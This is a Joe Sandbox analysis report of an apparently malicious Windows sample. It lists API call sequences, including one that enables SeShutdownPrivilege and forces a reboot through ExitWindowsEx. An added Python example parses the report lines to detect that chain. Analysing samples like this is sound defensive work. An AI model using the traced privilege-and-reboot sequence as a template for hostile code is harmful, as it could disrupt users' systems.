                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.3299777411.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                     • Associated: 00000000.00000002.3299745886.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.3299809276.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.3299842105.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorMode
                                                                                    • String ID:
                                                                                    • API String ID: 2340568224-0
                                                                                    • Opcode ID: 258b7047379ce46b8540a294da6ad57472ce1849ceeb23a1b4b516eeda09cad2
                                                                                    • Instruction ID: a55afa0689d716a84ca499c05243e055e04a08b2ab071a0afeb25d409e08decd
                                                                                    • Opcode Fuzzy Hash: 258b7047379ce46b8540a294da6ad57472ce1849ceeb23a1b4b516eeda09cad2
                                                                                    • Instruction Fuzzy Hash: FFA022A8C08000B2CE00E2E08080A3C23283A88308BC08BA2320CB20C0C03CE008020B
                                                                                    APIs
                                                                                    • CharPrevA.USER32(?,?,0040696C,?,00406649,?,?,00406D87,00000000,00406DAC,?,?,?,?,00000000,00000000), ref: 00406972
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.3299777411.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                     • Associated: 00000000.00000002.3299745886.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.3299809276.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.3299842105.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: CharPrev
                                                                                    • String ID:
                                                                                    • API String ID: 122130370-0
                                                                                    • Opcode ID: 4f55c7aa95ee0cc6def6f8b84b07f7a00b4eea213dcaa2411b48aa5a82a0c27b
                                                                                    • Instruction ID: 57bb655d476c0b104ac503b4dc16dcc9cc7d9309af7e6782790f501f1b0aeff9
                                                                                    • Opcode Fuzzy Hash: 4f55c7aa95ee0cc6def6f8b84b07f7a00b4eea213dcaa2411b48aa5a82a0c27b
                                                                                    • Instruction Fuzzy Hash:
                                                                                    APIs
                                                                                    • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 00407FA0
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.3299777411.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                     • Associated: 00000000.00000002.3299745886.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.3299809276.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.3299842105.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: AllocVirtual
                                                                                    • String ID:
                                                                                    • API String ID: 4275171209-0
                                                                                    • Opcode ID: f3d8bc7867bd0b1d1bf8a1a21c6b81e8059d467c94b9dab864cb1ccd8d8ada4e
                                                                                    • Instruction ID: 20a67eb23ea55951ef5110b519d4bcc97d420124264edb02c1094051c82f9398
                                                                                    • Opcode Fuzzy Hash: f3d8bc7867bd0b1d1bf8a1a21c6b81e8059d467c94b9dab864cb1ccd8d8ada4e
                                                                                    • Instruction Fuzzy Hash: D2117571A042059BDB00EF19C881B5B7794AF44359F05807EF958AB3C6DB38EC00CBAA
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.3299777411.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                     • Associated: 00000000.00000002.3299745886.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.3299809276.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.3299842105.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: CloseHandle
                                                                                    • String ID:
                                                                                    • API String ID: 2962429428-0
                                                                                    • Opcode ID: fc6098dcd6b1504a072b68d3feaaa537492281b052079d944a979dec092e75e7
                                                                                    • Instruction ID: e7ddd8f09f86228f97b62737e097d00c20d119481f2284b048c56b7aa048eabb
                                                                                    • Opcode Fuzzy Hash: fc6098dcd6b1504a072b68d3feaaa537492281b052079d944a979dec092e75e7
                                                                                    • Instruction Fuzzy Hash: 41D05E82B00A6017D615F2BE4D8869692D85F89685B08843AF654E77D1D67CEC00838D
                                                                                    APIs
                                                                                    • VirtualFree.KERNEL32(?,00000000,00008000,?,00407E9D), ref: 00407ECF
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.3299777411.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                     • Associated: 00000000.00000002.3299745886.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.3299809276.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.3299842105.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: FreeVirtual
                                                                                    • String ID:
                                                                                    • API String ID: 1263568516-0
                                                                                    • Opcode ID: c7bedad96efb848ea9f674ed311898bb29a23f2a16fc3a9de009753beeeb9dd9
                                                                                    • Instruction ID: 622015b425f940adf6dc1d0f89e873b9c6d17cfe6f0c2733970da1323f12c917
                                                                                    • Opcode Fuzzy Hash: c7bedad96efb848ea9f674ed311898bb29a23f2a16fc3a9de009753beeeb9dd9
                                                                                    • Instruction Fuzzy Hash: 3ED0E9B17553055BDB90EEB98CC1B0237D8BB48610F5044B66904EB296E674E8009654
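The next function block in this listing (GetCurrentProcess at 00409457 through ExitWindowsEx at 004094B3) is the code behind the report's "Contains functionality to shutdown / reboot the system" signature: the sample opens its own token, enables SeShutdownPrivilege with AdjustTokenPrivileges, reads GetLastError, and then calls ExitWindowsEx(00000002,00000000). As an added example that is not part of the Joe Sandbox report or of the sample, the Python below parses that block's "APIs" lines in the report's own line format, confirms the enable-privilege-then-ExitWindowsEx chain in call order, decodes the uFlags word (00000002 is EWX_REBOOT, so the sample reboots rather than logs off), and records whether GetLastError is read between AdjustTokenPrivileges and ExitWindowsEx. That last check matters because AdjustTokenPrivileges returns TRUE even when the privilege was not granted and only reports it through GetLastError() == ERROR_NOT_ALL_ASSIGNED. The sample lines are copied from the block that follows; the EWX_* values are the Windows SDK constants; all function and variable names are the example's own.

```python
import re
from typing import Dict, List, Optional

# Constructed sample input: the "APIs" lines of the shutdown function block,
# copied from this report in Joe Sandbox's own line format. The variable
# name and every function below are this example's own, not the report's.
SAMPLE_BLOCK = """\
• GetCurrentProcess.KERNEL32(00000028), ref: 00409457
• OpenProcessToken.ADVAPI32(00000000,00000028), ref: 0040945D
• LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,00000028), ref: 00409476
• AdjustTokenPrivileges.ADVAPI32(?,00000000,00000002,00000000,00000000,00000000), ref: 0040949D
• GetLastError.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 004094A2
• ExitWindowsEx.USER32(00000002,00000000), ref: 004094B3
"""

# One report line: "• Api.MODULE(arg,arg,...), ref: XXXXXXXX". Arguments are the
# stack slots Joe Sandbox saw at call time: 8 hex digits, a string, or "?".
API_LINE = re.compile(
    r"^\s*•\s*(?P<api>\w+)\.(?P<module>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)

# ExitWindowsEx uFlags bits (Windows SDK winuser.h values); 0 means EWX_LOGOFF.
EWX_FLAGS = {
    0x00000001: "EWX_SHUTDOWN",
    0x00000002: "EWX_REBOOT",
    0x00000004: "EWX_FORCE",
    0x00000008: "EWX_POWEROFF",
    0x00000010: "EWX_FORCEIFHUNG",
}


def parse_api_lines(text: str) -> List[Dict]:
    """Turn the report's bullet lines into call records, in listing order."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue  # headers ("APIs", "Strings") and "Part of subcall" lines
        raw = m.group("args")
        calls.append({
            "api": m.group("api"),
            "module": m.group("module"),
            "args": [a.strip() for a in raw.split(",")] if raw else [],
            "ref": int(m.group("ref"), 16),
        })
    return calls


def arg_as_int(arg: str) -> Optional[int]:
    """A 32-bit stack value as int, or None for '?' and string arguments."""
    return int(arg, 16) if re.fullmatch(r"[0-9A-Fa-f]{8}", arg) else None


def decode_ewx(value: int) -> List[str]:
    """Name the EWX_* bits set in an ExitWindowsEx uFlags word."""
    names = [name for bit, name in sorted(EWX_FLAGS.items()) if value & bit]
    return names or ["EWX_LOGOFF"]


def find_privileged_shutdown(calls: List[Dict]) -> Optional[Dict]:
    """Detect LookupPrivilegeValue(Se*Privilege) -> AdjustTokenPrivileges ->
    ExitWindowsEx in call order, and note whether GetLastError is read between
    the adjust and the exit (the ERROR_NOT_ALL_ASSIGNED check)."""
    priv_idx = priv_name = None
    for i, c in enumerate(calls):
        if c["api"].startswith("LookupPrivilegeValue"):
            priv_name = next((a for a in c["args"]
                              if a.startswith("Se") and a.endswith("Privilege")), None)
            if priv_name:
                priv_idx = i
                break
    if priv_idx is None:
        return None
    adjust_idx = next((i for i in range(priv_idx + 1, len(calls))
                       if calls[i]["api"] == "AdjustTokenPrivileges"), None)
    if adjust_idx is None:
        return None
    exit_idx = next((i for i in range(adjust_idx + 1, len(calls))
                     if calls[i]["api"] == "ExitWindowsEx"), None)
    if exit_idx is None:
        return None
    exit_call = calls[exit_idx]
    flags = arg_as_int(exit_call["args"][0]) if exit_call["args"] else None
    return {
        "privilege": priv_name,
        "flag_value": flags,
        "flags": decode_ewx(flags) if flags is not None else ["<unknown>"],
        "exit_ref": exit_call["ref"],
        "checks_not_all_assigned": any(
            c["api"] == "GetLastError" for c in calls[adjust_idx + 1:exit_idx]
        ),
    }


if __name__ == "__main__":
    print(find_privileged_shutdown(parse_api_lines(SAMPLE_BLOCK)))
```

Run against the block below, the detector reports privilege SeShutdownPrivilege, flags ["EWX_REBOOT"] at ref 004094B3, and confirms the GetLastError read between AdjustTokenPrivileges and ExitWindowsEx. The same parser works on any other function block in this report; the order check is deliberate, since a LookupPrivilegeValue that appears after ExitWindowsEx in listing order is not the same chain.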
                                                                                    APIs
                                                                                    • GetCurrentProcess.KERNEL32(00000028), ref: 00409457
                                                                                    • OpenProcessToken.ADVAPI32(00000000,00000028), ref: 0040945D
                                                                                    • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,00000028), ref: 00409476
                                                                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000002,00000000,00000000,00000000), ref: 0040949D
                                                                                    • GetLastError.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 004094A2
                                                                                    • ExitWindowsEx.USER32(00000002,00000000), ref: 004094B3
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.3299777411.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: ProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
                                                                                    • String ID: SeShutdownPrivilege
                                                                                    APIs
                                                                                    • FindResourceA.KERNEL32(00000000,00002B67,0000000A), ref: 00409BF6
                                                                                    • SizeofResource.KERNEL32(00000000,00000000,?,00409CE6,00000000,0040A27D,?,00000001,00000000,00000002,00000000,0040A2C5,?,00000000,0040A2FC), ref: 00409C09
                                                                                    • LoadResource.KERNEL32(00000000,00000000,00000000,00000000,?,00409CE6,00000000,0040A27D,?,00000001,00000000,00000002,00000000,0040A2C5,?,00000000), ref: 00409C1B
                                                                                    • LockResource.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00409CE6,00000000,0040A27D,?,00000001,00000000,00000002,00000000,0040A2C5), ref: 00409C2C
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.3299777411.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: Resource$FindLoadLockSizeof
                                                                                    • String ID:
                                                                                    APIs
                                                                                    • GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0040544A,?,?,?,00000000,004055FC), ref: 0040525B
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.3299777411.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: InfoLocale
                                                                                    • String ID:
                                                                                    APIs
                                                                                    • GetSystemTime.KERNEL32(?), ref: 004026CE
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.3299777411.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: SystemTime
                                                                                    • String ID:
                                                                                    APIs
                                                                                    • GetVersionExA.KERNEL32(?,004065E0,00000000,004065EE,?,?,?,?,?,00409C65), ref: 00405CF2
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.3299777411.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: Version
                                                                                    • String ID:
                                                                                    APIs
                                                                                    • GetModuleHandleA.KERNEL32(kernel32.dll,GetUserDefaultUILanguage,00000000,00407129,?,00000000,004098D0), ref: 0040704D
                                                                                    • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00407053
                                                                                    • RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,00407129,?,00000000,004098D0), ref: 004070A1
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.3299777411.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: AddressCloseHandleModuleProc
                                                                                    • String ID: .DEFAULT\Control Panel\International$Control Panel\Desktop\ResourceLocale$GetUserDefaultUILanguage$Locale$kernel32.dll
                                                                                    APIs
                                                                                    • CreateFileA.KERNEL32(00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403B1E
                                                                                    • GetFileSize.KERNEL32(?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403B42
                                                                                    • SetFilePointer.KERNEL32(?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403B5E
                                                                                    • ReadFile.KERNEL32(?,?,00000080,?,00000000,00000000,?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000), ref: 00403B7F
                                                                                    • SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 00403BA8
                                                                                    • SetEndOfFile.KERNEL32(?,?,00000000,00000000,00000002), ref: 00403BB2
                                                                                    • GetStdHandle.KERNEL32(000000F5), ref: 00403BD2
                                                                                    • GetFileType.KERNEL32(?,000000F5), ref: 00403BE9
                                                                                    • CloseHandle.KERNEL32(?,?,000000F5), ref: 00403C04
                                                                                    • GetLastError.KERNEL32(000000F5), ref: 00403C1E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.3299777411.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: File$HandlePointer$CloseCreateErrorLastReadSizeType
                                                                                    • String ID:
                                                                                    APIs
                                                                                    • RtlEnterCriticalSection.KERNEL32(0040C41C,00000000,00401AB4), ref: 00401A09
                                                                                    • LocalFree.KERNEL32(0046FE58,00000000,00401AB4), ref: 00401A1B
                                                                                    • VirtualFree.KERNEL32(?,00000000,00008000,0046FE58,00000000,00401AB4), ref: 00401A3A
                                                                                    • LocalFree.KERNEL32(0046E300,?,00000000,00008000,0046FE58,00000000,00401AB4), ref: 00401A79
                                                                                    • RtlLeaveCriticalSection.KERNEL32(0040C41C,00401ABB), ref: 00401AA4
                                                                                    • RtlDeleteCriticalSection.KERNEL32(0040C41C,00401ABB), ref: 00401AAE
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.3299777411.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
                                                                                    • String ID: $F$4F
                                                                                    APIs
                                                                                    • GetSystemDefaultLCID.KERNEL32(00000000,004055FC,?,?,?,?,00000000,00000000,00000000,?,004065DB,00000000,004065EE), ref: 004053CE
                                                                                      • Part of subcall function 004051FC: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040C4BC,00000001,?,004052C7,?,00000000,004053A6), ref: 0040521A
                                                                                      • Part of subcall function 00405248: GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0040544A,?,?,?,00000000,004055FC), ref: 0040525B
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.3299777411.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: InfoLocale$DefaultSystem
                                                                                    • String ID: AMPM$:mm$:mm:ss$m/d/yy$mmmm d, yyyy
                                                                                    APIs
                                                                                    • RtlInitializeCriticalSection.KERNEL32(0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 0040192E
                                                                                    • RtlEnterCriticalSection.KERNEL32(0040C41C,0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 00401941
                                                                                    • LocalAlloc.KERNEL32(00000000,00000FF8,0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 0040196B
                                                                                    • RtlLeaveCriticalSection.KERNEL32(0040C41C,004019D5,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 004019C8
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.3299777411.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: CriticalSection$AllocEnterInitializeLeaveLocal
                                                                                    • String ID: $F$4F
                                                                                    • API String ID: 730355536-545788489
                                                                                    • Opcode ID: aabd9570e7a52811c13604d6a46282fe49281d95e81aad3d3e53893a1864dea1
                                                                                    • Instruction ID: 093a8b970c40f4dda7bd37408b901a2e20e4e29fb74a5496b56404d4d89a3717
                                                                                    • Opcode Fuzzy Hash: aabd9570e7a52811c13604d6a46282fe49281d95e81aad3d3e53893a1864dea1
                                                                                    • Instruction Fuzzy Hash: CC0161B0684240DEE715ABA999E6B353AA4E786744F10427FF080F62F2C67C4450CB9D
                                                                                    APIs
                                                                                    • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00403D9D
                                                                                    • ExitProcess.KERNEL32 ref: 00403DE5
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.3299777411.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.3299745886.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.3299809276.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.3299842105.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: ExitMessageProcess
                                                                                    • String ID: Error$Runtime error at 00000000$9@
                                                                                    • API String ID: 1220098344-1503883590
                                                                                    • Opcode ID: 0b7abc0913d0e9b6482778e2bb40dc1e8adb9ed549d30d0444a38b969016e341
                                                                                    • Instruction ID: db3008c0e6bc5d60e05df0545d3e9f81ce91e923819fa2a9fb93000da4b6b716
                                                                                    • Opcode Fuzzy Hash: 0b7abc0913d0e9b6482778e2bb40dc1e8adb9ed549d30d0444a38b969016e341
                                                                                    • Instruction Fuzzy Hash: B521F830A04341CAE714EFA59AD17153E98AB49349F04837BD500B73E3C77C8A45C76E
                                                                                    APIs
                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 004036F2
                                                                                    • SysAllocStringLen.OLEAUT32(?,00000000), ref: 004036FD
                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 00403710
                                                                                    • SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 0040371A
                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00403729
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.3299777411.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.3299745886.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.3299809276.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.3299842105.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: ByteCharMultiWide$AllocString
                                                                                    • String ID:
                                                                                    • API String ID: 262959230-0
                                                                                    • Opcode ID: b88b94e5f034f8c4e706f080a825eb7b192e10e2750b3458b8a97e0288adf81d
                                                                                    • Instruction ID: 1285967c487f36a4f1f77a8b8e1f1fe351824cacfdb80e5859a13ebcd08b75b2
                                                                                    • Opcode Fuzzy Hash: b88b94e5f034f8c4e706f080a825eb7b192e10e2750b3458b8a97e0288adf81d
                                                                                    • Instruction Fuzzy Hash: 17F068A13442543AF56075A75C43FAB198CCB45BAEF10457FF704FA2C2D8B89D0492BD
                                                                                    APIs
                                                                                    • VirtualAlloc.KERNEL32(?,00100000,00002000,00000004,$F,?,?,?,00401800), ref: 004014B2
                                                                                    • VirtualAlloc.KERNEL32(?,?,00002000,00000004,?,00100000,00002000,00000004,$F,?,?,?,00401800), ref: 004014D7
                                                                                    • VirtualFree.KERNEL32(00000000,00000000,00008000,?,00100000,00002000,00000004,$F,?,?,?,00401800), ref: 004014FD
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.3299777411.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.3299745886.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.3299809276.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.3299842105.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: Virtual$Alloc$Free
                                                                                    • String ID: $F$4F
                                                                                    • API String ID: 3668210933-545788489
                                                                                    • Opcode ID: 53fb4fb4dead2bf9bf87b2a1222c08a4795459efffcdd9b971e00269c0061a0c
                                                                                    • Instruction ID: d5dc587d839e3be782c9b7b9e1ff5a952950f17ebcccd457e3de013d7af40e21
                                                                                    • Opcode Fuzzy Hash: 53fb4fb4dead2bf9bf87b2a1222c08a4795459efffcdd9b971e00269c0061a0c
                                                                                    • Instruction Fuzzy Hash: 7CF0C8717403106AEB316E694CC5F533AD89F85754F1040BAFA0DFF3DAD6745800826C
                                                                                    APIs
                                                                                    • GetModuleHandleA.KERNEL32(00000000,00409C56), ref: 004030E3
                                                                                    • GetCommandLineA.KERNEL32(00000000,00409C56), ref: 004030EE
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.3299777411.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.3299745886.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.3299809276.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.3299842105.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: CommandHandleLineModule
                                                                                    • String ID: U1hd.@$`&E
                                                                                    • API String ID: 2123368496-1561014801
                                                                                    • Opcode ID: ab44cebb113f23cc453db0582047ce3f33ed2b100303cb8959b7892e21e32e4b
                                                                                    • Instruction ID: 0f926add87520dc699e98d27074396f9fab16295c11a520b4b5863bd90c7cb52
                                                                                    • Opcode Fuzzy Hash: ab44cebb113f23cc453db0582047ce3f33ed2b100303cb8959b7892e21e32e4b
                                                                                    • Instruction Fuzzy Hash: 03C01274541300CAD328AFF69E8A304B990A385349F40823FA608BA2F1CA7C4201EBDD
                                                                                    APIs
                                                                                    • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,?,00000000,00406F48,?,00000000,004098D0,00000000), ref: 00406E4C
                                                                                    • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,70000000,?,?,00000000,00000000,00000000,?,00000000,00406F48,?,00000000), ref: 00406EBC
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.3299777411.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.3299745886.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.3299809276.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.3299842105.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: QueryValue
                                                                                    • String ID: )q@
                                                                                    • API String ID: 3660427363-2284170586
                                                                                    • Opcode ID: 6b21a0d37a83e471fd9d1ddb0c1b743920aead1f80a5b526095c1b0a651cf177
                                                                                    • Instruction ID: 7350e5e82036d2c0193b98364cdb321f9e6d5b5bf7e48a12e03045d443e4f3bd
                                                                                    • Opcode Fuzzy Hash: 6b21a0d37a83e471fd9d1ddb0c1b743920aead1f80a5b526095c1b0a651cf177
                                                                                    • Instruction Fuzzy Hash: DC414C31D0021AAFDB21DF95C881BAFB7B8EB05704F56457AE901B7280D738AF108B99
                                                                                    APIs
                                                                                    • Sleep.KERNEL32(?,?,?,?,0000000D,?,0040A220,000000FA,00000032,0040A287), ref: 004094F7
                                                                                    • Sleep.KERNEL32(?,?,?,?,0000000D,?,0040A220,000000FA,00000032,0040A287), ref: 00409507
                                                                                    • GetLastError.KERNEL32(?,?,?,0000000D,?,0040A220,000000FA,00000032,0040A287), ref: 0040951A
                                                                                    • GetLastError.KERNEL32(?,?,?,0000000D,?,0040A220,000000FA,00000032,0040A287), ref: 00409524
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.3299777411.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.3299745886.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.3299809276.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.3299842105.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorLastSleep
                                                                                    • String ID:
                                                                                    • API String ID: 1458359878-0
                                                                                    • Opcode ID: 597fcf42490b874720d4ad81cf19761f51130dad350fd41d24dc31ad960abd38
                                                                                    • Instruction ID: cd4a420f7ace5638a97e0bdb8a1e9fccbb234b9240edd4770f97938e6011a3cc
                                                                                    • Opcode Fuzzy Hash: 597fcf42490b874720d4ad81cf19761f51130dad350fd41d24dc31ad960abd38
                                                                                    • Instruction Fuzzy Hash: 16F0967360451477CA35A5AF9D81A5F634DDAD1354B10813BE945F3283C538DD0142A9
